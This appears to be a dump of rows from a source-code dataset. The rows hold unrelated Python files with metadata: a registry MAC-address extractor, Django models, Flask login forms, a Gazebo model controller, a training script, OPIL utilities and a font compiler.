] | null | null | null | modules/Registry/lv1_os_win_reg_mac_address.py | naaya17/carpe | fa2e3cfebe20f8839c985e5b9b78b538800172a1 | [
"Apache-2.0"
] | null | null | null |
class Mac_Address_Information:
par_id = ''
case_id = ''
evd_id = ''
mac_address = ''
description = ''
backup_flag = ''
source_location = []
def MACADDRESS(reg_system):
mac_address_list = []
mac_address_count = 0
reg_key = reg_system.find_key(r"ControlSet001\Control\Class\{4d36e972-e325-11ce-bfc1-08002be10318}")
for reg_subkey in reg_key.subkeys():
try:
for reg_subkey_value in reg_subkey.values():
if reg_subkey_value.name() == 'DeviceInstanceID':
if 'FFFF' in reg_subkey_value.data():
mac_address_information = Mac_Address_Information()
mac_address_list.append(mac_address_information)
mac_address_list[mac_address_count].source_location = []
mac_address_list[mac_address_count].source_location.append('SYSTEM-ControlSet001/Control/Class/{4d36e972-e325-11ce-bfc1-08002be10318}')
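                        # DeviceInstanceID embeds the MAC split around 'FFFF';
                        # the slices below take chars 0-5 and 10-15 of the
                        # trailing path segment and join the two halves.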
mac_address_list[mac_address_count].mac_address = reg_subkey_value.data().split('\\')[-1][0:6] + reg_subkey_value.data().split('\\')[-1][10:16]
mac_address_list[mac_address_count].description = reg_subkey.value(name='DriverDesc').data()
mac_address_count = mac_address_count + 1
        except Exception:
print('-----MAC Address Error')
return mac_address_list | 45.806452 | 167 | 0.625352 | 164 | 1,420 | 5.030488 | 0.323171 | 0.254545 | 0.118788 | 0.10303 | 0.541818 | 0.473939 | 0.242424 | 0.242424 | 0 | 0 | 0 | 0.057307 | 0.262676 | 1,420 | 31 | 168 | 45.806452 | 0.730659 | 0 | 0 | 0 | 0 | 0 | 0.137421 | 0.097956 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0 | 0 | 0.37037 | 0.037037 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
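`MACADDRESS` expects a registry object exposing the `find_key()` interface used above; how that object is built depends on the surrounding carpe framework. A purely hypothetical driver:

```python
# Hypothetical usage sketch; reg_system construction is framework-specific and assumed.
def dump_mac_addresses(reg_system):
    for info in MACADDRESS(reg_system):
        print(info.mac_address, info.description, info.source_location)
```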
25b1a19eb6d8e239df7d680bb083dcaf01ffaddb | 2,864 | py | Python | apps/exporter/models.py | mjj55409/cpq-exporter | ae46c1580a1c7d228a352a88a61164d9b3c2490c | [
"MIT"
] | null | null | null | apps/exporter/models.py | mjj55409/cpq-exporter | ae46c1580a1c7d228a352a88a61164d9b3c2490c | [
"MIT"
] | null | null | null | apps/exporter/models.py | mjj55409/cpq-exporter | ae46c1580a1c7d228a352a88a61164d9b3c2490c | [
"MIT"
] | null | null | null | from django.conf import settings
from django.db import models
# from django.template.defaultfilters import slugify
from django.utils.translation import ugettext_lazy as _
class KB (models.Model):
name = models.CharField(max_length=30, unique=True)
repository_url = models.CharField(max_length=100, blank=False)
def __str__(self):
return self.name
class Destination (models.Model):
TYPE_DB = 0
TYPE_ECC = 1
TYPE_CRM = 2
TYPE_CHOICES = (
(TYPE_DB, _('Database')),
(TYPE_ECC, _('ECC System')),
(TYPE_CRM, _('CRM System'))
)
name = models.CharField(max_length=30)
destination_type = models.SmallIntegerField(choices=TYPE_CHOICES, default=0)
client = models.CharField(max_length=3, default='000', blank=False)
def __str__(self):
return self.name
class DatabaseDestination (models.Model):
TYPE_MSSQL = 0
TYPE_MYSQL = 1
TYPE_JDBC = 2
TYPE_CHOICES = (
(TYPE_MSSQL, _('Microsoft SQL')),
(TYPE_MYSQL, _('MYSQL')),
(TYPE_JDBC, _('Java Connector'))
)
destination = models.OneToOneField(Destination, on_delete=models.CASCADE, primary_key=True)
database_type = models.SmallIntegerField(choices=TYPE_CHOICES, default=0)
host = models.CharField(max_length=100, blank=True)
port = models.CharField(max_length=7, blank=True)
database_name = models.CharField(max_length=100, blank=False)
def __str__(self):
return self.database_name + '@' + self.host + ':' + self.port
class SAPDestination (models.Model):
destination = models.OneToOneField(Destination, on_delete=models.CASCADE, primary_key=True)
host = models.CharField(max_length=100, blank=False)
sid = models.CharField(max_length=4, blank=False)
class Project (models.Model):
name = models.CharField(max_length=40, unique=True)
description = models.TextField(blank=True)
def __str__(self):
return self.name
class ProjectStep (models.Model):
project = models.ForeignKey(Project, on_delete=models.CASCADE, related_name='steps')
step_number = models.PositiveSmallIntegerField(null=False, default=1)
name = models.CharField(max_length=40, blank=True)
    kb = models.ForeignKey(KB, on_delete=models.CASCADE)  # on_delete is required from Django 2.0; CASCADE assumed
def __str__(self):
return self.project.name + '.' + self.kb.name
class Execution (models.Model):
    project = models.ForeignKey(Project, on_delete=models.CASCADE)
time_start = models.DateTimeField(null=True, blank=True)
time_end = models.DateTimeField(null=True, blank=True)
duration = models.DurationField(blank=True, null=True)
export_status = models.BooleanField(blank=True)
class ExecutionStep (models.Model):
    execution = models.ForeignKey(Execution, on_delete=models.CASCADE)
    step = models.ForeignKey(ProjectStep, on_delete=models.CASCADE)
time_start = models.DateTimeField()
time_end = models.DateTimeField()
status = models.BooleanField()
| 30.795699 | 95 | 0.706355 | 349 | 2,864 | 5.590258 | 0.26361 | 0.084572 | 0.101486 | 0.135315 | 0.433624 | 0.421322 | 0.309585 | 0.215274 | 0.160943 | 0.13634 | 0 | 0.014906 | 0.180168 | 2,864 | 92 | 96 | 31.130435 | 0.816014 | 0.017458 | 0 | 0.181818 | 0 | 0 | 0.025249 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075758 | false | 0 | 0.045455 | 0.075758 | 0.878788 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
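As a hedged illustration of how these models chain together (names and values are invented; assumes migrations have been applied):

```python
# Illustrative ORM usage only, not part of the original app.
kb = KB.objects.create(name='demo-kb', repository_url='https://example.com/kb.git')
project = Project.objects.create(name='Demo export', description='sketch')
ProjectStep.objects.create(project=project, step_number=1, name='extract', kb=kb)
```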
25b3918a371821cdc9c995f47c968bb1c9ab06ab | 6,312 | py | Python | src/forms.py | Afsharov/observer-frontend | bd93fd1d7fa1a63ca650640995e1f10b0c99df44 | [
"BSD-3-Clause"
] | null | null | null | src/forms.py | Afsharov/observer-frontend | bd93fd1d7fa1a63ca650640995e1f10b0c99df44 | [
"BSD-3-Clause"
] | null | null | null | src/forms.py | Afsharov/observer-frontend | bd93fd1d7fa1a63ca650640995e1f10b0c99df44 | [
"BSD-3-Clause"
] | 1 | 2021-04-23T08:25:55.000Z | 2021-04-23T08:25:55.000Z | """This module contains all forms used by the Observer-Hive frontend.
"""
import os
import json
import logging
from bcrypt import checkpw
from flask_wtf import FlaskForm
from flask_login import current_user
from wtforms import StringField, PasswordField
from wtforms.validators import InputRequired, EqualTo, Length
logger = logging.getLogger('src')
def get_users():
"""Retrieve all users and their passwords.
:return: dictionary with all users and passwords
"""
cwd = os.path.dirname(os.path.abspath(__file__))
with open(cwd + '/users.json') as registered_users:
users = json.load(registered_users)
return users
class LoginForm(FlaskForm):
"""This class defines the login form.
The form provides two entry fields for the user's
credentials: username and password.
"""
username = StringField('username',
validators=[InputRequired(
message="Please enter a Username.")])
password = PasswordField('password',
validators=[InputRequired(
message="Please enter your Password.")])
def __init__(self, *args, **kwargs):
FlaskForm.__init__(self, *args, **kwargs)
def validate(self):
"""Custom validator for the login form.
Checks if username is known to the app and compares the
entered password to the stored one.
:return: True if all checks have been passed
"""
rv = FlaskForm.validate(self)
if not rv:
return False
users = get_users()
username = self.username.data
if username not in users:
self.username.errors.append('Unknown username')
logger.info(username + ' unknown.')
return False
if not checkpw(self.password.data.encode('utf-8'),
users[username].encode('utf-8')):
self.password.errors.append('Invalid password')
logger.info('Denied access to '
+ username
+ ' due to wrong password.')
return False
return True
class ChangeCredentialsForm(FlaskForm):
"""This class defines the form to change an existing users password.
The form provides one entry fields for the current password and two
entry fields for new password, the second one being used for verification.
"""
username = StringField('username',
validators=[InputRequired(
message="Please enter a Username.")])
currentPassword = PasswordField('currentPassword',
validators=[
InputRequired(
message="Please enter your current Password.")])
newPassword1 = PasswordField('newPassword1',
validators=[
InputRequired(
message="Please enter your new Password."),
Length(min=4,
message="Your password must contain at least 4 characters.")])
newPassword2 = PasswordField('newPassword2',
validators=[
InputRequired(message=
"Please enter your new Password again."),
EqualTo('newPassword1',
message=
'Passwords must match')])
def __init__(self, *args, **kwargs):
FlaskForm.__init__(self, *args, **kwargs)
def validate(self):
"""Custom validator to change credentials.
        Checks that the user entered the password currently in use; the new
        password itself is checked by the field validators (minimum length
        and a matching confirmation entry).
:return: True if all checks have been passed.
"""
rv = FlaskForm.validate(self)
if not rv:
return False
users = get_users()
if not checkpw(self.currentPassword.data.encode('utf-8'),
users[current_user.id].encode('utf-8')):
self.currentPassword.errors.append('Invalid password')
logger.info('Attempt to change password of '
+ current_user.id
+ ' failed due to wrong current password.')
return False
return True
class RegisterForm(FlaskForm):
"""This class defines part the registration form.
The form provides entry fields for the chosen username and
two entry fields for a password, the second one being used for verification.
"""
username = StringField('username',
validators=[InputRequired(
message="Please enter a Username.")])
password1 = PasswordField('password1',
validators=[
InputRequired(
message="Please enter your new Password."),
Length(min=4,
message="Your password must contain at least 4 characters.")])
password2 = PasswordField('password2',
validators=[
InputRequired(message=
"Please enter your new Password again."),
EqualTo('password1',
message=
'Passwords must match')])
def __init__(self, *args, **kwargs):
FlaskForm.__init__(self, *args, **kwargs)
def validate(self):
"""Custom validator for new user registrations.
Checks if password is at least 4 characters long and verifies the
correct entry by comparing it to the second input of password.
:return: True if all checks have been passed.
"""
rv = FlaskForm.validate(self)
if not rv:
return False
return True
| 35.460674 | 106 | 0.53628 | 596 | 6,312 | 5.615772 | 0.260067 | 0.061846 | 0.080669 | 0.096803 | 0.475949 | 0.435913 | 0.366597 | 0.366597 | 0.366597 | 0.366597 | 0 | 0.004938 | 0.390368 | 6,312 | 177 | 107 | 35.661017 | 0.864865 | 0.209918 | 0 | 0.574257 | 0 | 0 | 0.149812 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.069307 | false | 0.257426 | 0.079208 | 0 | 0.366337 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
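A minimal sketch of wiring `LoginForm` into a Flask view (the route, template name, and redirect target are assumptions, not part of this module):

```python
# Hypothetical view using LoginForm above; `app` is the Flask application object.
from flask import redirect, render_template

@app.route('/login', methods=['GET', 'POST'])
def login():
    form = LoginForm()
    if form.validate_on_submit():  # runs the custom validate() defined above
        return redirect('/')
    return render_template('login.html', form=form)
```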
25beeed839f274d72d91b74c8a4940ac9efd14ae | 1,570 | py | Python | eddiebot_apps/eddiebot_ssl/scripts/model_controller.py | TooSchoolForCool/EddieBot-ROS | 5dad6d5a6eb974135b7c9587abc0ae17d1ec6760 | [
"Apache-2.0"
] | 5 | 2019-05-15T19:31:47.000Z | 2019-08-31T01:12:35.000Z | eddiebot_apps/eddiebot_ssl/scripts/model_controller.py | TooSchoolForCool/EddieBot-ROS | 5dad6d5a6eb974135b7c9587abc0ae17d1ec6760 | [
"Apache-2.0"
] | null | null | null | eddiebot_apps/eddiebot_ssl/scripts/model_controller.py | TooSchoolForCool/EddieBot-ROS | 5dad6d5a6eb974135b7c9587abc0ae17d1ec6760 | [
"Apache-2.0"
] | 4 | 2019-06-03T12:21:44.000Z | 2019-12-25T08:57:46.000Z | #!/usr/bin/env python
import rospy
import tf
from gazebo_msgs.srv import SetModelState, DeleteModel, SpawnModel
from gazebo_msgs.msg import ModelState
from geometry_msgs.msg import Pose, Point, Quaternion
class ModelController(object):
def __init__(self):
rospy.wait_for_service("gazebo/delete_model")
rospy.wait_for_service("gazebo/spawn_sdf_model")
rospy.wait_for_service("gazebo/set_model_state")
self.set_state_srv_ = rospy.ServiceProxy("/gazebo/set_model_state", SetModelState)
self.spawn_model_srv_ = rospy.ServiceProxy("/gazebo/spawn_sdf_model", SpawnModel)
self.delete_model_srv_ = rospy.ServiceProxy("/gazebo/delete_model", DeleteModel)
def goto(self, model, x, y, yaw):
quaternion = tf.transformations.quaternion_from_euler(0, 0, yaw)
pose = Pose()
pose.position.x = x
pose.position.y = y
pose.position.z = 0
pose.orientation.x = quaternion[0]
pose.orientation.y = quaternion[1]
pose.orientation.z = quaternion[2]
pose.orientation.w = quaternion[3]
state = ModelState()
state.model_name = model
state.pose = pose
try:
ret = self.set_state_srv_(state)
# print("[ModelController]: {}".format(ret.status_message))
        except Exception as e:
rospy.logerr('Error on calling service: %s',str(e))
def spawn_model(self, model_name, model_sdf, x, y, z):
pose = Pose()
pose.position.x = x
pose.position.y = y
pose.position.z = z
pose.orientation.w = 1
self.spawn_model_srv_(model_name, model_sdf, "", pose, "world")
def delete_model(self, model_name):
self.delete_model_srv_(model_name) | 28.545455 | 84 | 0.738217 | 226 | 1,570 | 4.893805 | 0.29646 | 0.065099 | 0.03255 | 0.051537 | 0.221519 | 0.142857 | 0.088608 | 0.088608 | 0.088608 | 0.088608 | 0 | 0.005926 | 0.140127 | 1,570 | 55 | 85 | 28.545455 | 0.813333 | 0.049682 | 0 | 0.153846 | 0 | 0 | 0.108652 | 0.060362 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.128205 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
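A hypothetical driver node for the controller above (node name, model name, and pose are illustrative; requires a running roscore and Gazebo providing these services):

```python
# Illustrative driver sketch.
if __name__ == '__main__':
    rospy.init_node('model_controller_demo')
    mc = ModelController()
    mc.goto('eddiebot', 1.0, 2.0, 0.0)  # teleport model 'eddiebot' to (1, 2), yaw 0
```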
25c80db82d1ebad170680349cd93672e15412051 | 1,342 | py | Python | code/src/main.py | ChaofWang/AWSRN | b7e285e73667e114ccb69e354254c4f67ca39e25 | [
"MIT"
] | 162 | 2019-04-05T02:05:45.000Z | 2022-01-15T02:16:59.000Z | code/src/main.py | ChaofWang/AWSRN | b7e285e73667e114ccb69e354254c4f67ca39e25 | [
"MIT"
] | 16 | 2019-05-11T15:38:25.000Z | 2020-08-12T13:15:45.000Z | code/src/main.py | ChaofWang/AWSRN | b7e285e73667e114ccb69e354254c4f67ca39e25 | [
"MIT"
] | 22 | 2019-04-20T14:37:51.000Z | 2022-03-21T05:58:17.000Z | import torch
import utility
import data
import model
import loss
from option import args
from trainer import Trainer
def print_network(net):
num_params = 0
for param in net.parameters():
num_params += param.numel()
print(net)
print('Total number of parameters: %d' % num_params)
def print_setting(net, args):
print('init this train:')
print_network(net)
print('training model:', args.model)
print('scale:', args.scale)
print('resume from ', args.resume)
print('output patch size', args.patch_size)
print('model setting: n_resblocks:', args.n_resblocks,
'n_feats:', args.n_feats, 'block_feats:', args.block_feats)
print('optimization setting: ', args.optimizer)
print('total epochs:', args.epochs)
print('lr:', args.lr, 'lr_decay at:', args.decay_type, 'decay gamma:', args.gamma)
print('train loss:', args.loss)
print('save_name:', args.save)
torch.manual_seed(args.seed)
checkpoint = utility.checkpoint(args)
if checkpoint.ok:
loader = data.Data(args)
model = model.Model(args, checkpoint)
print_setting(model, args)
loss = loss.Loss(args, checkpoint) if not args.test_only else None
t = Trainer(args, loader, model, loss, checkpoint)
while not t.terminate():
t.train()
t.test()
checkpoint.done()
| 27.958333 | 87 | 0.671386 | 183 | 1,342 | 4.819672 | 0.355191 | 0.030612 | 0.034014 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00093 | 0.198957 | 1,342 | 47 | 88 | 28.553191 | 0.819535 | 0 | 0 | 0 | 0 | 0 | 0.168531 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051282 | false | 0 | 0.179487 | 0 | 0.230769 | 0.435897 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
25c81eb343b1d3a48857d65ac0f1c63ee02f3d87 | 710 | py | Python | mycroft/views.py | seakers/daphne-brain | 1d703d468cd503a21395f986dd72e67b6e556451 | [
"MIT"
] | null | null | null | mycroft/views.py | seakers/daphne-brain | 1d703d468cd503a21395f986dd72e67b6e556451 | [
"MIT"
] | null | null | null | mycroft/views.py | seakers/daphne-brain | 1d703d468cd503a21395f986dd72e67b6e556451 | [
"MIT"
] | null | null | null | from rest_framework.views import APIView
from rest_framework.response import Response
from auth_API.helpers import get_or_create_user_information
class CheckConnection(APIView):
def post(self, request, format=None):
# --> 1. Get connection status and id
user_info = get_or_create_user_information(request.session, request.user, 'EOSS')
conn_status = user_info.mycroft_connection
conn_id = user_info.mycroft_session
print('--> CHECKING MYCROFT CONNECTIONS:', conn_id, conn_status)
if conn_status is False:
return Response({"connection": "false", "access_token": conn_id})
else:
return Response({"connection": "true"})
| 29.583333 | 89 | 0.7 | 87 | 710 | 5.448276 | 0.505747 | 0.050633 | 0.07173 | 0.063291 | 0.109705 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001783 | 0.209859 | 710 | 23 | 90 | 30.869565 | 0.843137 | 0.049296 | 0 | 0 | 0 | 0 | 0.116418 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.230769 | 0 | 0.538462 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
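A sketch of routing the view above (the URL pattern is an assumption; the project's actual `urls.py` may differ):

```python
# Hypothetical urls.py entry for the view above.
from django.urls import path
from mycroft.views import CheckConnection

urlpatterns = [
    path('mycroft/check-connection/', CheckConnection.as_view()),
]
```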
25d2427f17acf99c0e015181ad76ec8cf75b6f09 | 1,065 | py | Python | src/bst/pygasus/datamanager/grokker.py | codeix/bst.pygasus.datamanager | 3b60cbc0b44814701fcbc8c5558a30002a9a2778 | [
"ZPL-2.1"
] | null | null | null | src/bst/pygasus/datamanager/grokker.py | codeix/bst.pygasus.datamanager | 3b60cbc0b44814701fcbc8c5558a30002a9a2778 | [
"ZPL-2.1"
] | null | null | null | src/bst/pygasus/datamanager/grokker.py | codeix/bst.pygasus.datamanager | 3b60cbc0b44814701fcbc8c5558a30002a9a2778 | [
"ZPL-2.1"
] | null | null | null | import martian
from martian.error import GrokError
from grokcore.component import name as namedirective
from zope import component
from bst.pygasus.datamanager.model import ExtBaseModel
from bst.pygasus.datamanager.interfaces import IModelTransformer
from bst.pygasus.datamanager.transformer import ModelTransfomerUtility
class schema(martian.Directive):
scope = martian.CLASS
store = martian.ONCE
default = None
class ExtModelGrokker(martian.ClassGrokker):
martian.component(ExtBaseModel)
martian.directive(schema)
martian.directive(namedirective)
def execute(self, class_, schema, name, **kw):
if schema is None:
            raise GrokError('Class %s is missing directive "schema". Need an '
                            'Interface to create the model.' % class_, class_)
if not name:
name = class_.__name__
gsm = component.getGlobalSiteManager()
transformer = ModelTransfomerUtility(class_, schema)
gsm.registerUtility(transformer, IModelTransformer, name)
return True
| 31.323529 | 86 | 0.721127 | 112 | 1,065 | 6.776786 | 0.455357 | 0.027668 | 0.055336 | 0.098814 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.212207 | 1,065 | 33 | 87 | 32.272727 | 0.904648 | 0 | 0 | 0 | 0 | 0 | 0.005634 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04 | false | 0 | 0.28 | 0 | 0.56 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
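A sketch of a model class the grokker above would pick up (the interface and utility name are invented):

```python
# Hypothetical model definition; IPerson is an assumed zope Interface.
class PersonModel(ExtBaseModel):
    schema(IPerson)          # consumed by ExtModelGrokker.execute()
    namedirective('person')  # the utility is registered under this name
```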
25d28a94c243549378bccac5503509c7d698f1cd | 4,833 | py | Python | intent_parser/utils/opil_utils.py | SD2E/experimental-intent-parser | 65aee0ad800777f265210766a9e5eac431e0feaa | [
"BSD-3-Clause"
] | 3 | 2020-07-09T19:52:58.000Z | 2020-08-05T18:05:54.000Z | intent_parser/utils/opil_utils.py | SD2E/experimental-intent-parser | 65aee0ad800777f265210766a9e5eac431e0feaa | [
"BSD-3-Clause"
] | 293 | 2020-06-19T18:51:27.000Z | 2021-09-17T20:42:41.000Z | intent_parser/utils/opil_utils.py | SD2E/experimental-intent-parser | 65aee0ad800777f265210766a9e5eac431e0feaa | [
"BSD-3-Clause"
] | null | null | null | """
Provides a list of functions for building opil objects.
"""
from intent_parser.intent.measure_property_intent import MeasuredUnit
from intent_parser.intent_parser_exceptions import IntentParserException
import intent_parser.utils.sbol3_utils as sbol3_utils
import intent_parser.table.cell_parser as cell_parser
import intent_parser.constants.intent_parser_constants as ip_constants
import opil
import tyto
def create_opil_boolean_parameter_value(value: bool):
parameter_value = opil.BooleanValue()
parameter_value.value = value
return parameter_value
def create_opil_enumerated_parameter_value(value: str):
parameter_value = opil.EnumeratedValue()
parameter_value.value = value
return parameter_value
def create_opil_integer_parameter_value(value: int):
parameter_value = opil.IntegerValue()
parameter_value.value = value
return parameter_value
def create_opil_measurement_parameter_value(value: float, unit=''):
parameter_value = opil.MeasureValue()
measure = MeasuredUnit(value, unit)
parameter_value.has_measure = measure.to_opil_measure()
return parameter_value
def create_opil_string_parameter_value(value: str):
parameter_value = opil.StringValue()
parameter_value.value = value
return parameter_value
def create_opil_URI_parameter_value(value: str):
parameter_value = opil.URIValue()
parameter_value.value = value
return parameter_value
def create_parameter_value_from_parameter(opil_parameter, parameter_value):
if isinstance(opil_parameter, opil.BooleanParameter):
return create_opil_boolean_parameter_value(bool(parameter_value))
elif isinstance(opil_parameter, opil.EnumeratedParameter):
return create_opil_enumerated_parameter_value(str(parameter_value))
elif isinstance(opil_parameter, opil.IntegerParameter):
return create_opil_integer_parameter_value(int(parameter_value))
elif isinstance(opil_parameter, opil.MeasureParameter):
if cell_parser.PARSER.is_number(str(parameter_value)):
return create_opil_measurement_parameter_value(parameter_value, tyto.OM.number)
possible_units = list(ip_constants.FLUID_UNIT_MAP.keys()) + list(ip_constants.TIME_UNIT_MAP.keys())
measured_units = cell_parser.PARSER.process_values_unit(parameter_value,
units=possible_units,
unit_type='fluid')
if len(measured_units) != 1:
raise IntentParserException('Expecting one Measurement Parameter value but %d were found.' % len(measured_units))
return create_opil_measurement_parameter_value(float(measured_units[0].get_value()),
measured_units[0].get_unit())
elif isinstance(opil_parameter, opil.StringParameter):
return create_opil_string_parameter_value(str(parameter_value))
elif isinstance(opil_parameter, opil.URIParameter):
return create_opil_URI_parameter_value(str(parameter_value))
def get_param_value_as_string(parameter_value):
if type(parameter_value) is opil.BooleanValue:
return str(parameter_value.value)
elif type(parameter_value) is opil.EnumeratedValue:
return str(parameter_value.value)
elif type(parameter_value) is opil.IntegerValue:
return str(parameter_value.value)
elif type(parameter_value) is opil.MeasureValue:
if parameter_value.has_measure:
measure_number = float(parameter_value.has_measure.value)
measure_unit = sbol3_utils.get_unit_name_from_uri(parameter_value.has_measure.unit)
if measure_unit:
if measure_unit == tyto.OM.number:
return str(measure_number)
else:
return str(measure_number) + ' ' + measure_unit
return str(measure_number)
elif type(parameter_value) is opil.StringValue:
return parameter_value.value if parameter_value.value else ' '
elif type(parameter_value) is opil.URIValue:
return str(parameter_value.value)
elif isinstance(parameter_value, str):
return parameter_value
return ''
def fix_nonunique_parameter_names(doc):
# Collect all objects in Document
all_objects = doc.find_all(lambda obj: True if obj.name else False)
# Gather objects with non-unique names
name_map = {o.name: [] for o in all_objects if o.name}
for o in all_objects:
name_map[o.name].append(o)
# Rename using name + description + display_id
for name, nonuniquely_named_objects in name_map.items():
if len(nonuniquely_named_objects) > 1:
for o in nonuniquely_named_objects:
o.name = f'{o.name} ({o.description})({o.display_id})'
| 43.540541 | 125 | 0.723774 | 589 | 4,833 | 5.62309 | 0.193548 | 0.253623 | 0.097524 | 0.041667 | 0.428744 | 0.310386 | 0.249094 | 0.173007 | 0.173007 | 0.157005 | 0 | 0.001822 | 0.205256 | 4,833 | 110 | 126 | 43.936364 | 0.860453 | 0.035175 | 0 | 0.206897 | 0 | 0 | 0.023426 | 0.007092 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103448 | false | 0 | 0.08046 | 0 | 0.448276 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25d56f5b093e66a6e34a5f01df8b3463c937cd78 | 1,537 | py | Python | Tools/fontcompile.py | aunicornfarmer/gotris | 6c125071d5add7fc71716ecbb08474c607561555 | [
"MIT"
] | 63 | 2015-01-03T04:19:23.000Z | 2021-07-19T22:33:16.000Z | Tools/fontcompile.py | aunicornfarmer/gotris | 6c125071d5add7fc71716ecbb08474c607561555 | [
"MIT"
] | 1 | 2015-09-14T08:55:40.000Z | 2018-01-23T08:56:47.000Z | Tools/fontcompile.py | aunicornfarmer/gotris | 6c125071d5add7fc71716ecbb08474c607561555 | [
"MIT"
] | 28 | 2015-02-23T10:31:05.000Z | 2021-06-18T12:33:51.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
# compiled font is a binary blob:
# 1. magic (MFNT) - 4 bytes
# 2. number of symbols - 4 bytes
# 3. font y advance - 4 bytes
# 4. an array of glyphs (offset_x, offset_y, width, height, tx, ty, tx2, ty2, x_advance) - 36 * number of symbols
#    (struct format "<iiIIffffI")
# 5. a table of (unicode codepoint, 1-based glyph index) pairs, sorted by codepoint - 8 * number of symbols
# 6. png texture
import sys
import struct
import os
from xml2obj import xml2obj
def print_usage_and_exit():
print "usage: {0} <UNPACKED FONT>".format(sys.argv[0])
sys.exit(1)
if len(sys.argv) != 2:
print_usage_and_exit()
fontfile = sys.argv[1]
if not os.path.exists(fontfile):
print_usage_and_exit()
glyphs = []
with file(fontfile + ".fontdef.xml", 'r') as f:
xmlobj = xml2obj(f.read())
font_y_advance = int(xmlobj.height)
for g in xmlobj.glyph:
glyphs.append((unicode(g.symbol), int(g.offset_x), int(g.offset_y), int(g.width), int(g.height), float(g.tx), float(g.ty), float(g.tx2), float(g.ty2), int(g.x_advance)))
with file(fontfile[:-4] + ".font", 'w') as f:
f.write("MFNT")
f.write(struct.pack("<I", len(glyphs)))
f.write(struct.pack("<I", font_y_advance))
for g in glyphs:
f.write(struct.pack("<iiIIffffI", g[1], g[2], g[3], g[4], g[5], g[6], g[7], g[8], g[9]))
unicode_fontcp = []
for i, g in enumerate(glyphs):
unicode_fontcp.append((g[0], i+1))
def unicode_fontcp_key(item):
return item[0]
unicode_fontcp.sort(key=unicode_fontcp_key)
for entry in unicode_fontcp:
f.write(struct.pack("<II", ord(entry[0]), entry[1]))
with file(fontfile, 'r') as imgf:
imgdata = imgf.read()
f.write(imgdata)
| 25.616667 | 170 | 0.666233 | 273 | 1,537 | 3.652015 | 0.355311 | 0.036108 | 0.048144 | 0.064193 | 0.062187 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028963 | 0.146389 | 1,537 | 59 | 171 | 26.050847 | 0.730945 | 0.193234 | 0 | 0.057143 | 0 | 0 | 0.054427 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.114286 | null | null | 0.114286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25db68b1e4b300ed7435559d769a87a914307b00 | 1,171 | py | Python | app/tests/support/test_views.py | Valaraucoo/raven | 0157e193baf569be9479a78838dc26d77a11a99d | [
"BSD-3-Clause"
] | 3 | 2020-12-27T21:52:52.000Z | 2021-08-23T10:26:10.000Z | app/tests/support/test_views.py | Valaraucoo/raven | 0157e193baf569be9479a78838dc26d77a11a99d | [
"BSD-3-Clause"
